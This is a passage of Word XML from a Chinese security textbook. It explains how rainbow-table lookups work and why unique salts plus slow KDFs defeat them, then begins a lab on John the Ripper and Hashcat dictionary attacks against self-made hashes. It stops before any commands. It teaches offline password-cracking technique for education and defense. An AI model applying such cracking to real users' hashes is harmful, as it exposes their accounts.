        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表中只保存起点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和终点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Pk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，中间所有口令和哈希均被丢弃。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过使用不同的归约函数序列，彩虹表避免了普通链条中的“碰撞导致链条合并”问题，保持了不同链之间的独立性，从而提高了密钥空间的覆盖率。假设需要覆盖的密钥空间大小为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>N</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，每条链的长度为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>k</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，且我们构建了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>m</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">条链，那么理论覆盖的独特口令数最多为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>m</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>×</m:t>
        </m:r>
        <m:r>
          <m:t>k</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（但实际由于碰撞存在会低于此值）。成功的概率可以用经验公式近似：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <m:oMathPara>
        <m:oMathParaPr>
          <m:jc m:val="center"/>
        </m:oMathParaPr>
        <m:oMath>
          <m:sSub>
            <m:e>
              <m:r>
                <m:t>P</m:t>
              </m:r>
            </m:e>
            <m:sub>
              <m:r>
                <m:rPr>
                  <m:nor/>
                  <m:sty m:val="p"/>
                </m:rPr>
                <m:t>success</m:t>
              </m:r>
            </m:sub>
          </m:sSub>
          <m:r>
            <m:rPr>
              <m:sty m:val="p"/>
            </m:rPr>
            <m:t>≈</m:t>
          </m:r>
          <m:r>
            <m:t>1</m:t>
          </m:r>
          <m:r>
            <m:rPr>
              <m:sty m:val="p"/>
            </m:rPr>
            <m:t>−</m:t>
          </m:r>
          <m:sSup>
            <m:e>
              <m:d>
                <m:dPr>
                  <m:begChr m:val="("/>
                  <m:sepChr m:val=""/>
                  <m:endChr m:val=")"/>
                  <m:grow/>
                </m:dPr>
                <m:e>
                  <m:r>
                    <m:t>1</m:t>
                  </m:r>
                  <m:r>
                    <m:rPr>
                      <m:sty m:val="p"/>
                    </m:rPr>
                    <m:t>−</m:t>
                  </m:r>
                  <m:f>
                    <m:fPr>
                      <m:type m:val="bar"/>
                    </m:fPr>
                    <m:num>
                      <m:r>
                        <m:t>m</m:t>
                      </m:r>
                    </m:num>
                    <m:den>
                      <m:r>
                        <m:t>N</m:t>
                      </m:r>
                    </m:den>
                  </m:f>
                </m:e>
              </m:d>
            </m:e>
            <m:sup>
              <m:r>
                <m:t>k</m:t>
              </m:r>
            </m:sup>
          </m:sSup>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:bookmarkEnd w:id="239"/>
    <w:bookmarkStart w:id="240" w:name="攻击过程"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当攻击者获得一个待破解的哈希值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试将其放在链的尾部：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">施加归约函数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Rk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">得到候选口令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，再哈希得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，然后查找表中是否有以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为终点的链。若找到，则从该链起点开始重新计算整条链，直到某一步计算出该哈希，此时对应的输入口令即为结果。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若未找到，则假设</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在链条的倒数第二个位置：应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">R_{k-1}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、哈希、再应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">R_k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">得到新哈希，再次查表。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如此最多进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次尝试。如果所有尝试均未命中，说明该哈希未被该组彩虹表覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">彩虹表的时空权衡之所以精妙，在于它将攻击时的计算复杂度从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>O</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>N</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">降到了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>O</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>k</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而构建表时付出的预计算成本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>O</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>m</m:t>
            </m:r>
            <m:r>
              <m:t>k</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以被多次攻击平摊。在无盐场景中，一旦表构建完成，所有使用同一哈希函数的口令都可以几乎瞬间被查找。例如，一个针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无盐哈希的彩虹表可以覆盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位以内大小写加数字的口令空间，查表仅需数秒。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三态标注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：彩虹表的时间-空间权衡原理、链碰撞概率、归约函数的设计动机属于密码学攻击的通用原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①；彩虹表对特定哈希模式（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM、LM）的覆盖率和有效性因表参数而异，属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ②。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="240"/>
    <w:bookmarkEnd w:id="241"/>
    <w:bookmarkStart w:id="242" w:name="盐为何破坏彩虹表标①②"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盐为何破坏彩虹表（标①②）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“盐”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（salt）是一个全局唯一或每用户唯一的随机字节串，在哈希之前与口令拼接。现代密码存储中，盐与哈希一同以明文形式存储。盐的存在对抗彩虹表的机理极其直接，可以用攻击者的成本模型解释：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无盐时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有用户的口令使用完全相同的哈希函数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>H</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>p</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。攻击者构建一张覆盖口令空间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
            <m:scr m:val="script"/>
          </m:rPr>
          <m:t>P</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的彩虹表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>T</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，即可查找任何用户的哈希，成本为一次查表时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">使用唯一盐时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：数据库中的哈希实际为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>H</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>s</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>i</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>∥</m:t>
            </m:r>
            <m:r>
              <m:t>p</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>s</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <m:t>i</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的独立盐。此时，若要使用预计算表攻击用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，攻击者必须构建一张对应于该盐的、覆盖空间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
            <m:scr m:val="script"/>
          </m:rPr>
          <m:t>P</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:e>
            <m:r>
              <m:t>T</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:sSub>
              <m:e>
                <m:r>
                  <m:t>s</m:t>
                </m:r>
              </m:e>
              <m:sub>
                <m:r>
                  <m:t>i</m:t>
                </m:r>
              </m:sub>
            </m:sSub>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>n</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个用户，需要的预计算量变为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>O</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>n</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>⋅</m:t>
            </m:r>
            <m:d>
              <m:dPr>
                <m:begChr m:val="|"/>
                <m:sepChr m:val=""/>
                <m:endChr m:val="|"/>
                <m:grow/>
              </m:dPr>
              <m:e>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                    <m:scr m:val="script"/>
                  </m:rPr>
                  <m:t>P</m:t>
                </m:r>
              </m:e>
            </m:d>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，与实时暴力破解所有用户口令的计算量已无本质差异。因此，唯一盐使得预计算攻击的价值荡然无存，除非某些口令极度高频到值得为每个盐构建小表——那也是直接字典攻击更有吸引力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值得注意的是，盐并不增加每次猜测的计算开销，它只消除了预计算的可能性。要同时防御离线暴力穷举，必须依赖慢哈希（key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> derivation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">function，KDF），如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt、scrypt、PBKDF2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Argon2。这些算法通过大量迭代或内存硬性约束，使每一次口令试猜的时间成本显著增加。慢哈希与唯一盐的结合，是当代防御离线密码破解的黄金标准。彩虹表对此组合完全无效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三态标注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：盐消除彩虹表预计算优势的原理是通用密码学设计原则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①；具体的盐长度建议（如至少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位随机值）属于工程安全标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①；推荐使用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-63B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等标准内容</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ①。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="242"/>
    <w:bookmarkStart w:id="246" w:name="靶机实操john-the-ripper-与-hashcat-字典攻击标②"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操：John</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Ripper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字典攻击（标②）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本实操单元的目标是让读者在授权环境中实际执行离线字典攻击，理解工具输出和失败原因，而不是追求破解出特定口令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章搭建的隔离实验网段，并使用自行生成的密码哈希文件。严禁使用他人的哈希数据库。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="243" w:name="准备哈希文件"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">准备哈希文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先，生成一个测试哈希文件。以下示例使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenSSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SHA-256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希（无盐，仅供演示）：</w:t>
      </w:r>
    </w:p>
    <w:p>
